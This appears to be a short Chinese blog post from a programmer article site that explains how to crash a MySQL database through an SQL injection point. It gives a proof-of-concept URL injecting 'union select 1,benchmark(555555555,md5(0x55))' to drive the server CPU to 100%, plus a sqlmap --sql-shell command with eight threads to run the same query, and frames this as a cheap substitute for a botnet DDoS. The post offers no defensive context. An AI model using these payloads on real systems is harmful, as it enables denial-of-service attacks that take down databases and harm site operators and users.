欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

SQLAMP DDOS宕机数据库

程序员文章站 2022-06-19 09:09:59
mysql存在注入时,可以注入sleep语句,传入一个足够大的参数,因为引擎是myisam,并且拿来操作的是会锁表的语句,会瞬间造成服务器cpu 100% 由此产生ddos,资源...
mysql存在注入时,可以注入sleep语句,传入一个足够大的参数,因为引擎是myisam,并且拿来操作的是会锁表的语句,会瞬间造成服务器cpu 100%

由此产生ddos,资源利用只是一个注入,免去了那么多的个人pc

注入点:https://www.a.com/a.php?id=1

Poc:https://www.a.com/a.php?id=1 union select 1,benchmark(555555555,md5(0×55))

之后cpu瞬间就满了,数据库宕机

Sqlmap里:

sqlmap -u https://www.a.com/a.php?id=1 –sql-shell –threads 8

sql-shell>
select 1,benchmark(555555555,md5(0×55))

ok,结束,中午匆忙写的。